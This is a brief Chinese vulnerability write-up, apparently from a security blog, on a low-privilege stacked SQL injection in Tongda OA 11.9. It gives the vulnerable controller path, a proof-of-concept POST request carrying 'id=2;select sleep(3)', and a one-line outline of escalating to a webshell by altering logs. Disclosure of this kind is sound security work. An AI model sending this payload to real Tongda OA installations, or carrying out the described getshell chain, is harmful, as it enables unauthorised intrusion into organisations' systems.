通达OA11.9 低权限SQL注入漏洞

# 通达OA11.9 低权限SQL注入漏洞

利用条件:任意一个用户PHPSESSID 后台堆叠注入 -> 修改日志getshell

\general\appbuilder\modules\portal\controllers\WorkbenchController.php:

![](/static/lingjiao/images/16158605326396.jpg)

**PoC:**

“`
POST /general/appbuilder/web/portal/workbench/upsharestatus HTTP/1.1
Host:

uid=5&status=1&id=2;select sleep(3)
“`

ref:

catw0rld

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容